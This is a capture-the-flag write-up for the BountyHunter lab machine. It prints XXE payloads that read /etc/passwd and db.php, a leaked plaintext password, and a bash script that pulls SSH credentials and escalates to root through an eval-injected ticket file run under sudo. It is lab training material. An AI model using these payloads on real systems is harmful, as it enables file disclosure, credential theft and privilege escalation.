bountyhunter

# Recon

```
sudo nmap -sC -sV -T4 -Pn  -O -oN nmap.bountyhunter.txt 10.129.146.231
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 21:25 EDT
Nmap scan report for 10.129.146.231
Host is up (0.014s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
|   256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
|_  256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Bounty Hunters
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/26%OT=22%CT=1%CU=40458%PV=Y%DS=2%DC=I%G=Y%TM=60FF608
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.69 seconds
```
 36
 37# Enumeration
 38
 39http://bountyhunter.htb/resources/bountylog.js
 40
 41```
 42function returnSecret(data) {
 43	return Promise.resolve($.ajax({
 44            type: "POST",
 45            data: {"data":data},
 46            url: "tracker_diRbPr00f314.php"
 47            }));
 48}
 49
 50async function bountySubmit() {
 51	try {
 52		var xml = `<?xml  version="1.0" encoding="ISO-8859-1"?>
 53		<bugreport>
 54		<title>${$('#exploitTitle').val()}</title>
 55		<cwe>${$('#cwe').val()}</cwe>
 56		<cvss>${$('#cvss').val()}</cvss>
 57		<reward>${$('#reward').val()}</reward>
 58		</bugreport>`
 59		let data = await returnSecret(btoa(xml));
 60  		$("#return").html(data)
 61	}
 62	catch(error) {
 63		console.log('Error:', error);
 64	}
 65}
 66
 67```
 68
 69
 70
 71```
 72POST /tracker_diRbPr00f314.php HTTP/1.1
 73Host: 10.129.146.231
 74User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
 75Accept: */*
 76Accept-Language: en-US,en;q=0.5
 77Accept-Encoding: gzip, deflate
 78Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 79X-Requested-With: XMLHttpRequest
 80Content-Length: 245
 81Origin: http://10.129.146.231
 82Connection: close
 83Referer: http://10.129.146.231/log_submit.php
 84
 85data=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT5URVNUVElUTEU8L3RpdGxlPgoJCTxjd2U%2BVEVTVENXRTwvY3dlPgoJCTxjdnNzPlRFU1RTQ09SRTwvY3Zzcz4KCQk8cmV3YXJkPlRFU1RSRVdBUkQ8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4%3D
 86```
 87
 88URL Decoded 
 89```
 90PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT5URVNUVElUTEU8L3RpdGxlPgoJCTxjd2U+VEVTVENXRTwvY3dlPgoJCTxjdnNzPlRFU1RTQ09SRTwvY3Zzcz4KCQk8cmV3YXJkPlRFU1RSRVdBUkQ8L3Jld2FyZD4KCQk8L2J1Z3JlcG9ydD4=
 91```
 92
 93BASE64 Decoded
 94
 95```
 96<?xml  version="1.0" encoding="ISO-8859-1"?>
 97		<bugreport>
 98		<title>TESTTITLE</title>
 99		<cwe>TESTCWE</cwe>
100		<cvss>TESTSCORE</cvss>
101		<reward>TESTREWARD</reward>
102		</bugreport>
103```
104
105
106# Exploitation
107
108```
109<?xml  version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo[<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
110		<bugreport>
111		<title>&xxe;</title>
112		<cwe>TESTCWE</cwe>
113		<cvss>TESTSCORE</cvss>
114		<reward>TESTREWARD</reward>
115		</bugreport>
116```
BASE64 Encoded

```
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz48IURPQ1RZUEUgZm9vWzwhRU5USVRZIHh4ZSBTWVNURU0gImZpbGU6Ly8vZXRjL3Bhc3N3ZCI+XT4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT4meHhlOzwvdGl0bGU+CgkJPGN3ZT5URVNUQ1dFPC9jd2U+CgkJPGN2c3M+VEVTVFNDT1JFPC9jdnNzPgoJCTxyZXdhcmQ+VEVTVFJFV0FSRDwvcmV3YXJkPgoJCTwvYnVncmVwb3J0Pg==
```

121URL Encoded 
122```
123%50%44%39%34%62%57%77%67%49%48%5a%6c%63%6e%4e%70%62%32%34%39%49%6a%45%75%4d%43%49%67%5a%57%35%6a%62%32%52%70%62%6d%63%39%49%6b%6c%54%54%79%30%34%4f%44%55%35%4c%54%45%69%50%7a%34%38%49%55%52%50%51%31%52%5a%55%45%55%67%5a%6d%39%76%57%7a%77%68%52%55%35%55%53%56%52%5a%49%48%68%34%5a%53%42%54%57%56%4e%55%52%55%30%67%49%6d%5a%70%62%47%55%36%4c%79%38%76%5a%58%52%6a%4c%33%42%68%63%33%4e%33%5a%43%49%2b%58%54%34%4b%43%51%6b%38%59%6e%56%6e%63%6d%56%77%62%33%4a%30%50%67%6f%4a%43%54%78%30%61%58%52%73%5a%54%34%6d%65%48%68%6c%4f%7a%77%76%64%47%6c%30%62%47%55%2b%43%67%6b%4a%50%47%4e%33%5a%54%35%55%52%56%4e%55%51%31%64%46%50%43%39%6a%64%32%55%2b%43%67%6b%4a%50%47%4e%32%63%33%4d%2b%56%45%56%54%56%46%4e%44%54%31%4a%46%50%43%39%6a%64%6e%4e%7a%50%67%6f%4a%43%54%78%79%5a%58%64%68%63%6d%51%2b%56%45%56%54%56%46%4a%46%56%30%46%53%52%44%77%76%63%6d%56%33%59%58%4a%6b%50%67%6f%4a%43%54%77%76%59%6e%56%6e%63%6d%56%77%62%33%4a%30%50%67%3d%3d
124```
125
126BURP Repeater request
127
128```
129POST /tracker_diRbPr00f314.php HTTP/1.1
130Host: 10.129.147.202
131User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
132Accept: */*
133Accept-Language: en-US,en;q=0.5
134Accept-Encoding: gzip, deflate
135Content-Type: application/x-www-form-urlencoded; charset=UTF-8
136X-Requested-With: XMLHttpRequest
137Content-Length: 929
138Origin: http://10.129.147.202
139Connection: close
140Referer: http://10.129.147.202/log_submit.php
141
142data=%50%44%39%34%62%57%77%67%49%48%5a%6c%63%6e%4e%70%62%32%34%39%49%6a%45%75%4d%43%49%67%5a%57%35%6a%62%32%52%70%62%6d%63%39%49%6b%6c%54%54%79%30%34%4f%44%55%35%4c%54%45%69%50%7a%34%38%49%55%52%50%51%31%52%5a%55%45%55%67%5a%6d%39%76%57%7a%77%68%52%55%35%55%53%56%52%5a%49%48%68%34%5a%53%42%54%57%56%4e%55%52%55%30%67%49%6d%5a%70%62%47%55%36%4c%79%38%76%5a%58%52%6a%4c%33%42%68%63%33%4e%33%5a%43%49%2b%58%54%34%4b%43%51%6b%38%59%6e%56%6e%63%6d%56%77%62%33%4a%30%50%67%6f%4a%43%54%78%30%61%58%52%73%5a%54%34%6d%65%48%68%6c%4f%7a%77%76%64%47%6c%30%62%47%55%2b%43%67%6b%4a%50%47%4e%33%5a%54%35%55%52%56%4e%55%51%31%64%46%50%43%39%6a%64%32%55%2b%43%67%6b%4a%50%47%4e%32%63%33%4d%2b%56%45%56%54%56%46%4e%44%54%31%4a%46%50%43%39%6a%64%6e%4e%7a%50%67%6f%4a%43%54%78%79%5a%58%64%68%63%6d%51%2b%56%45%56%54%56%46%4a%46%56%30%46%53%52%44%77%76%63%6d%56%33%59%58%4a%6b%50%67%6f%4a%43%54%77%76%59%6e%56%6e%63%6d%56%77%62%33%4a%30%50%67%3d%3d
143```
144
145```
146root:x:0:0:root:/root:/bin/bash
147daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
148bin:x:2:2:bin:/bin:/usr/sbin/nologin
149sys:x:3:3:sys:/dev:/usr/sbin/nologin
150sync:x:4:65534:sync:/bin:/bin/sync
151games:x:5:60:games:/usr/games:/usr/sbin/nologin
152man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
153lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
154mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
155news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
156uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
157proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
158www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
159backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
160list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
161irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
162gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
163nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
164systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
165systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
166systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
167messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
168syslog:x:104:110::/home/syslog:/usr/sbin/nologin
169_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
170tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
171uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
172tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
173landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
174pollinate:x:110:1::/var/cache/pollinate:/bin/false
175sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
176systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
177development:x:1000:1000:Development:/home/development:/bin/bash
178lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
179usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
180```
181
182
183
184
```
cat xxe.xml |base64 -w 0 |xxd -p|tr -d \\n|sed 's/../%&/g'
```

https://gist.githubusercontent.com/Rajchowdhury420/b0e58d1e7ee22e017f65e1a18560ae56/raw/2d63b911df1cb3057ab90fd5e25bfde3e7347954/one-click-root.sh

```
data='<?xml  version="1.0" encoding="UTF-8"?><!DOCTYPE title [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]><bugreport><title></title><cwe></cwe><cvss></cvss><reward>&xxe;</reward></bugreport>'
user=$(bash -c "curl -X POST --data-urlencode \"data=$(echo $data | base64 -w 0)\" 'http://bountyhacker.htb/tracker_diRbPr00f314.php'  | html2markdown | tail -n 2 | head -n 1 | base64 -d" 2>/dev/null | grep '/bin/bash$' | awk -F':' '{print $5}' | cut -d , -f1 | tail -n 1 | tr '[:upper:]' '[:lower:]') 
data='<?xml  version="1.0" encoding="UTF-8"?><!DOCTYPE title [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php">]><bugreport><title></title><cwe></cwe><cvss></cvss><reward>&xxe;</reward></bugreport>'
password1=$(bash -c "curl -X POST --data-urlencode \"data=$(echo $data | base64 -w 0)\" 'http://bountyhacker.htb/tracker_diRbPr00f314.php'  | html2markdown | tail -n 2 | head -n 1 | base64 -d" 2>/dev/null | grep -i '$dbpassword' | cut -d '"' -f 2)

echo "Got SSH Creds ! Username= $user , Password= $password1"

sshpass -p "$password1" ssh -oStrictHostKeyChecking=accept-new "$user"@bountyhacker.htb 'bash -c "echo IyBTa3l0cmFpbiBJbmMKIyMgVGlja2V0IHRvICAgICBhYmMKX19UaWNrZXQgQ29kZTpfXwpfX1RpY2tldCBDb2RlOl9fCioqNCsyMDArZXhlYygnJydpbXBvcnQgb3M7b3Muc3lzdGVtKCJlY2hvIC1uICdmbGFnIHVzZXIudHh0PSAnOyBjYXQgL2hvbWUvZGV2ZWxvcG1lbnQvdXNlci50eHQ7IGVjaG8gLW4gJ2ZsYWcgcm9vdC50eHQ9ICc7Y2F0IC9yb290L3Jvb3QudHh0IiknJycpCg==" | base64 -d > root.md; echo "root.md" | sudo $(sudo -l | rev | awk '"'"'{print $1" "$2}'"'"' | rev | tail -n 1)' 2>/dev/null | grep flag | awk  '{print $2 " " $3}'
```
199
200
201m19RoAU0hP41A1sTsq6K
202
203
204
205# Post-exploit/PrivEsc
206
207
208
```
development@bountyhunter:/var/www/html$ find / -name *.md 2>/dev/null
/opt/skytrain_inc/invalid_tickets/390681613.md
/opt/skytrain_inc/invalid_tickets/734485704.md
/opt/skytrain_inc/invalid_tickets/529582686.md
/opt/skytrain_inc/invalid_tickets/600939065.md
/var/lib/fwupd/builder/README.md
/usr/share/fwupd/remotes.d/vendor/firmware/README.md
/usr/share/alsa/ucm2/README.md
/usr/share/alsa/ucm/README.md
/usr/share/doc/systemd/DISTRO_PORTING.md
/usr/share/doc/systemd/TRANSLATORS.md
/usr/share/doc/sos/README.md
/usr/share/doc/command-not-found/README.md
/usr/share/doc/libtasn1-6/README.md
/usr/share/doc/libcbor0.6/README.md
/usr/share/doc/libfuse2/README.md
/usr/share/doc/python3-requests/README.md
/usr/share/doc/sosreport/README.md
/usr/share/doc/procps/bugs.md
/usr/share/doc/psmisc/README.md
/usr/share/doc/libpcap0.8/README.md
/usr/share/doc/bolt/README.md
/usr/share/doc/accountsservice/README.md
/usr/share/doc/byobu/README.md
/usr/share/doc/python3-httplib2/README.md
```
234
235
236
```
development@bountyhunter:/var/www/html$ cat /opt/skytrain_inc/invalid_tickets/600939065.md
# Skytrain Inc
## Ticket to Essex
__ticket code:__
**11+321+1**
##Issued: 2021/05/12
#End Ticket
```
244
245
246
247
248```
249#Skytrain Inc Ticket Validation System 0.1
250#Do not distribute this file.
251
252def load_file(loc):
253    if loc.endswith(".md"):
254        return open(loc, 'r')
255    else:
256        print("Wrong file type.")
257        exit()
258
259def evaluate(ticketFile):
260    #Evaluates a ticket to check for ireggularities.
261    code_line = None
262    for i,x in enumerate(ticketFile.readlines()):
263        if i == 0:
264            if not x.startswith("# Skytrain Inc"):
265                return False
266            continue
267        if i == 1:
268            if not x.startswith("## Ticket to "):
269                return False
270            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}")
271            continue
272
273        if x.startswith("__Ticket Code:__"):
274            code_line = i+1
275            continue
276
277        if code_line and i == code_line:
278            if not x.startswith("**"):
279                return False
280            ticketCode = x.replace("**", "").split("+")[0]
281            if int(ticketCode) % 7 == 4:
282                validationNumber = eval(x.replace("**", ""))
283                if validationNumber > 100:
284                    return True
285                else:
286                    return False
287    return False
288
289def main():
290    fileName = input("Please enter the path to the ticket file.\n")
291    ticket = load_file(fileName)
292    #DEBUG print(ticket)
293    result = evaluate(ticket)
294    if (result):
295        print("Valid ticket.")
296    else:
297        print("Invalid ticket.")
298    ticket.close
299
300main()
301
302```
303
304
305```
306# Skytrain Inc
307## Ticket to Essex
308__ticket code:__
309**11+321+1**
310##Issued: 2021/05/12
311#End Ticket
312
313```
314
315
316```
317# Skytrain Inc
318## Ticket to Essex
319__Ticket Code:__
320**11+321+1**
321##Issued: 2021/05/12
322#End Ticket
323```
324
325